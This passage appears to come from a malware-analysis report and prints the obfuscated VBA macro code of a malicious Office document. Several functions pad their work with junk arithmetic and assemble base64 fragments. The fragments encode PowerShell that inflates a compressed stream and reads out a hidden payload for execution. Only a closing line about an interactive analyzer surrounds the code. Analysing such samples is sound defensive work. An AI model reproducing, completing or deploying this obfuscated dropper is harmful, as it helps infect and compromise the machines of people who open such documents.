EJbDr = Hex(AWcYK * ChrW(iKEzT + Int(CXJqHc * Rnd(23029)) * QdQSpo * Log(13932 * BNwXDS - siKRLK + Fix(51))))
OGrvi = Tan(43917)
vrOvhj = "sASQBpACsA" + "VwBOAHIAZ" + "ABiAHoA" + "eQ" + "BhAEMAY" + "wB6AEgAUQ" + "BY" + "AE0ANgBa"
NBwrR = Tan(75396)
FJjWA = JrCvb
hRHzKA = CDbl(EOJbt)
kYoMw = lfSmZa
LKCXEv = Hex(uooFD * ChrW(rBiIwi + Int(MPbVfD * Rnd(32496)) * FPiiXO * Log(78644 * CrFfZ - vjiIK + Fix(51))))
jwKqql = Tan(67218)
iFzmhNjJZj = "AEg" + "AdABN" + "AFEAZABQAFQANg" + "BSAHQASQBZ" + "AGwAYQBvAFQARgB" + "kAHgAZwBIA" + "GUAbgB6AD"
ihsAii = Tan(79676)
KWjZC = fQrCPw
smWtd = CDbl(IFnrl)
tWVwEB = YWZLcl
nQtzoV = Hex(bquWHB * ChrW(jTWiu + Int(JZKRmB * Rnd(39515)) * zSatI * Log(85510 * rMoDQ - Rjaczz + Fix(51))))
sCDhi = Tan(84401)
zfEURI = "EAYwBQAGkAN" + "wBlAGsAZ" + "AB" + "RAFEAVgB2AHcATA" + "BpAGoANQB" + "EAD"
XojhMdBQN = rErrhHjB + WuVRmAWhQKw + sPzvizL + sCfFST + qKSIj + vrOvhj + iFzmhNjJZj + zfEURI
End Function
Function GNQVlPSz()
On Error Resume Next
NGbMmA = Tan(20931)
XTczIF = Hhadws
jppBzh = CDbl(PtLQRF)
kbRPkn = HAwrR
vVGEt = Hex(TWmXkD * ChrW(iIaQjr + Int(DWFJON * Rnd(8863)) * corKji * Log(99174 * nHWimO - EjMHEA + Fix(51))))
jPzRwZ = Tan(30364)
RakZtO = "IA" + "UwB3" + "AFIARgBjAGY" + "AQQAr" + "AGQASwBKAGYAZQ"
pjiiuz = Tan(61818)
WwjOnJ = JNpXB
BGzkvF = CDbl(LOfadq)
qDDTA = FpIVl
aCpDJB = Hex(SnZiw * ChrW(sDOHTI + Int(wrWGKV * Rnd(44160)) * YMwizB * Log(59743 * VLWYP - dQYFV + Fix(51))))
UqioM = Tan(261)
zKvrwhtiq = "BUA" + "EkAcwBpAE0AeAB" + "1AEYARABW" + "AE4AdwA3AGMAeQB" + "oAGEAaQAwAGIATA"
ifjtni = Tan(69584)
baAwwN = twzkVX
FhFAO = CDbl(hiJRz)
wulRi = fdCpYG
vqzlr = Hex(iZVaCo * ChrW(PaNzRj + Int(sRjHiO * Rnd(80348)) * tLQJwc * Log(37657 * jsSoU - bTjdvi + Fix(51))))
QEYoG = Tan(60911)
OlUpcAS = "BrAHAAbwA1AHUA" + "bgB0AGgAeQ" + "B1AEQAZABiAFgAb" + "wAvADEALwBTAE" + "YAbwA3AFYAT"
GpGcno = Tan(61096)
KtpKw = dEwvf
pPYAS = CDbl(kdGrU)
wpMulp = fwRJp
khznza = Hex(bRoqRF * ChrW(bDCDS + Int(wNGuj * Rnd(36746)) * tzOYG * Log(66697 * hdnpH - bRiBV + Fix(51))))
ffZbwO = Tan(82177)
OQNznNGKFIL = "wBDAGMAb" + "wB6AHAARABjAEQ" + "AegBYAHIAUwBpA" + "GQAVgBxAFgA" + "ZgBjAHEAbQBy" + "AHEARAA4ACsAegB" + "3AGUASABa" + "ADMAKwBpAEMAb" + "ABWAGgAaQB0A" + "HEA"
sWbCD = Tan(62476)
zbCPk = ucwQMv
wfjFZ = CDbl(ndUXS)
PRTLC = maAcpb
lulDbL = Hex(SpUMnV * ChrW(ztmiEk + Int(URaRv * Rnd(60538)) * VBUqHT * Log(75934 * BasMi - awHXjH + Fix(51))))
hNzlrj = Tan(32445)
ViphZ = "Zg" + "BU" + "AEUA" + "MQ" + "BnAHYANQBuA" + "DcAOABYAEEARg" + "BQAHgA" + "YgArADkAU" + "QBFAHMAdA"
LmfjIz = Tan(76704)
WjCqlr = mrBNu
StPYm = CDbl(nXFPnW)
poMjZu = wkqiRC
BKtpSW = Hex(ssQHW * ChrW(AcRQO + Int(DCXZL * Rnd(53096)) * HXhDk * Log(13105 * wmMLZU - YwwvYD + Fix(51))))
mUTaPz = Tan(97453)
BrCpPkROqCw = "BLAG4ATwBy" + "AEIANQ" + "B6AFcAMABmA" + "DQAawBEADEAb" + "QB0ACsANQ"
GNQVlPSz = RakZtO + zKvrwhtiq + OlUpcAS + OQNznNGKFIL + ViphZ + BrCpPkROqCw
End Function
Function wfdzu()
On Error Resume Next
dlhOzP = Tan(72337)
pjBnL = QFquT
FbinYh = CDbl(DOcVI)
KJbiLU = nmHPXP
ZDOjVi = Hex(iCHtp * ChrW(uiwML + Int(CAEpaf * Rnd(48815)) * rTUOQI * Log(14391 * AztziR - GTkVCq + Fix(51))))
puEiN = Tan(49636)
KEWdRT = "BhADUAQQ" + "B1A" + "FkARgBKAGIAQQBH" + "ADE" + "AYwBjA" + "DEAVQBoAEgAMgA2" + "AE"
NnEvv = Tan(53308)
isdjK = hwSLNl
zVpJW = CDbl(mdZKlv)
bmLpDi = NYbHos
XsbsRc = Hex(WswvZ * ChrW(plIhr + Int(cWvldH * Rnd(59148)) * KYuhUi * Log(98873 * kzRUT - EtNtif + Fix(51))))
cQtQD = Tan(28918)
VYSQOVzzz = "8ATAA0ADYAZQBkA" + "EsATwBTAEoASw" + "BaAEUANgA0AFgA" + "NwBZA" + "GoAWQBNAE" + "MAa" + "wA4AEg" + "AMQB5AEUAYwBM" + "AGYA" + "cQByAGkA"
bHwlm = Tan(62784)
wwQauE = ALQXS
SCXjcz = CDbl(iIARQP)
odzjhm = GvwTja
bFdtlR = Hex(ZjOIn * ChrW(KpzzJf + Int(lXLjpf * Rnd(19495)) * GbQsY * Log(38279 * DWXfw - PulYu + Fix(51))))
dQzzJ = Tan(9592)
RIvAGqArnt = "QwBpAGI" + "AVQBXAFYAMQBtAG" + "0Ae" + "AB0AHIATwB4AHQ" + "AYg" + "BuAG0AaAB1A"
pEttE = Tan(10653)
sSIzP = RDmbb
jBWdaL = CDbl(ijuJdH)
YiCJdT = qhwlnI
jZiWVi = Hex(wTbTi * ChrW(aazJi + Int(bqnAcz * Rnd(16445)) * qUZrm * Log(5641 * vHPmI - PZKbqu + Fix(51))))
zQjnH = Tan(96401)
qnfLwQUCGj = "GEAMwB3A" + "DIAWA" + "B3AF" + "MAbwA4AGE" + "AN" + "QB2AHgAN" + "wBBAG" + "wARgBy" + "ADYARQAvAHYA"
qvZCYM = Tan(51849)
itjhfv = ThWVNL
dZmCz = CDbl(akmjo)
XziNO = BivQrJ
NTwBQ = Hex(lVZSzQ * ChrW(NWHtH + Int(sJYflU * Rnd(15573)) * LdVMhc * Log(75315 * kdjVwD - zhizsi + Fix(51))))
aBJrQG = Tan(79007)
QIAwiGnPt = "MQB" + "WACsANQ" + "BuAE" + "QAQgBNAEoA" + "NA" + "BwAEMAM" + "ABJAFcAWA"
LhILZs = Tan(8271)
Snibl = KmBpJa
DWPsfC = CDbl(DpMjw)
SBMndH = bPKKGt
qWqawO = Hex(IKtTtp * ChrW(CcaBfp + Int(JZOMC * Rnd(63005)) * nMElm * Log(12953 * jzlkiF - qTTjR + Fix(51))))
ZnjJb = Tan(8573)
KczUwcmZ = "BTAEMAbwAzAE" + "8A" + "Uw" + "BGAFU" + "AUABGA" + "DUAdAAxADEAcA" + "AyA" + "FQAYgA2AGIA" + "eA" + "B5AGYAcQBRA"
hzbOth = Tan(39449)
wohHi = VdpQw
BSGuck = CDbl(wzdvK)
WwjXWq = lpsim
iDDJts = Hex(UiOqhm * ChrW(KXUUs + Int(ZMJmG * Rnd(35780)) * wwMZcI * Log(99976 * TsqkD - Moisqk + Fix(51))))
pNUYlQ = Tan(4563)
RlzEYpKbX = "GIAVgB" + "XAH" + "EAUgBuAFcAQQBKA" + "GMANQBiAGYAN" + "gA0AFEAcwBx" + "AHIAegBUAF" + "gAVwBaA"
tRDbR = Tan(64104)
VoOZm = qfikp
MXbuQi = CDbl(HlrBqs)
fabmIl = rStdRz
whqov = Hex(pwSXn * ChrW(YZkdnY + Int(ocQDrb * Rnd(6728)) * VFiQzk * Log(37372 * DBNuS - jIDzQ + Fix(51))))
ZGpGF = Tan(69268)
srrKiFaz = "HoAegAyA" + "DYAYwBrA" + "EkALwBRAHUANw" + "BGAG" + "EAKwBoA"
wfdzu = KEWdRT + VYSQOVzzz + RIvAGqArnt + qnfLwQUCGj + QIAwiGnPt + KczUwcmZ + RlzEYpKbX + srrKiFaz
End Function
Function EinoWiKElO()
On Error Resume Next
zhdwM = Tan(85496)
TtjGoI = QjbZd
jwIAs = CDbl(qRPQb)
PbWbZ = ACiom
zLIII = Hex(NjbVc * ChrW(YdGBC + Int(EdHuY * Rnd(62313)) * pHYZbf * Log(85020 * kCjCh - pCvju + Fix(51))))
VCvzwA = Tan(33364)
KjBPaiTEQ = "Fo" + "ALwAxADM" + "ASABxAFQA" + "ZAA3AGoAb" + "QBSAFEAa" + "wBpADIA" + "bABqAGsAYQBC" + "AFg" + "AYQBF"
IQCmbZ = Tan(37670)
pHApj = obZzUI
bMLij = CDbl(mLaaa)
HBUzt = IpXNoi
PiOUX = Hex(fIVhDr * ChrW(uLjHO + Int(ZabpUb * Rnd(61090)) * LTrNY * Log(53956 * QjYrC - vGmUQI + Fix(51))))
jzIQzI = Tan(17515)
cERHU = "AGMA" + "cwB" + "lAE8AWABIAEUA" + "dwBt" + "AE" + "cAVQBDAHQAKwA" + "2AFIAVQBpAGgAM" + "wBnADI"
nptssb = Tan(38066)
iTfPhi = IQLEiU
UDTtrO = CDbl(bOPSv)
tiwKAb = HAksE
UzAnD = Hex(JzUpZw * ChrW(FdDFPw + Int(BiiRAE * Rnd(5495)) * iUTbp * Log(80207 * LbbMol - YoZMQW + Fix(51))))
EuUvSB = Tan(72997)
MDMQBHzXlz = "AKwB3AFEAPQ" + "AnAC" + "AAKQAgAC" + "wAIABbAHM"
imwbG = Tan(30211)
WzJtK = ciDIA
Jpsoo = CDbl(PdZwfX)
IqsoNM = PYSbDW
WcQRn = Hex(fcjpz * ChrW(vrlaX + Int(lFCbj * Rnd(79961)) * vVGlXR * Log(71518 * UsBJh - FJfKCr + Fix(51))))
Qndzu = Tan(17307)
IhbdpzO = "AeQBzA" + "HQA" + "ZQBt" + "AC4ASQB" + "vA" + "C4AQwBPA" + "E0AUAByAGUAcw"
EinoWiKElO = KjBPaiTEQ + cERHU + MDMQBHzXlz + IhbdpzO
End Function
Function ARDmRFFn()
On Error Resume Next
RJvsa = Tan(53583)
zYqIYM = bzkRpZ
vWRjwm = CDbl(hdncIT)
LwJiF = IloBi
KpotjE = Hex(kVmiLc * ChrW(MPvDfQ + Int(sPCaij * Rnd(47471)) * KhPCT * Log(53526 * tjHYZj - YSzGQo + Fix(51))))
plVNlR = Tan(50467)
hWHWlNT = "BTAGkATwBuAC4" + "AYw" + "BvAG0AcAB" + "yAGUAcwBT" + "AGkAbwB" + "OAG0Abw" + "Bk" + "AGUAXQA6A" + "DoARABlAEMA" + "TwBtAHAAUgBFA"
SzUKLL = Tan(9260)
IINXW = wHrJO
kccTjj = CDbl(wupiK)
HQJDO = TUDpz
RWdpN = Hex(cDjBq * ChrW(BafqI + Int(TaDIO * Rnd(91094)) * EcluWh * Log(76163 * RSKqGj - FGfGa + Fix(51))))
CoscLi = Tan(41463)
TNTlTXp = "HMAUwA" + "gACkAKQAgAC" + "wAIABbAFQARQB4A" + "HQALgBFAG4AYwB" + "PAGQAaQB" + "OAGc" + "AXQA6ADoAYQBTAE" + "MAS"
wJHiC = Tan(17728)
qIMTCq = IUABoB
wdIUz = CDbl(osSLz)
GSJCI = XYOwS
XwSfXc = Hex(tUDBj * ChrW(NFGFwp + Int(UkjQz * Rnd(35393)) * zRcFwK * Log(40896 * wkIVqB - zDRcD + Fix(51))))
wQSQIR = Tan(34819)
LUMlI = "QBJACkAKQA" + "uAFIARQBhA" + "GQAdABvAEUAb" + "gBkACgAK" + "QA="
ARDmRFFn = hWHWlNT + TNTlTXp + LUMlI
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.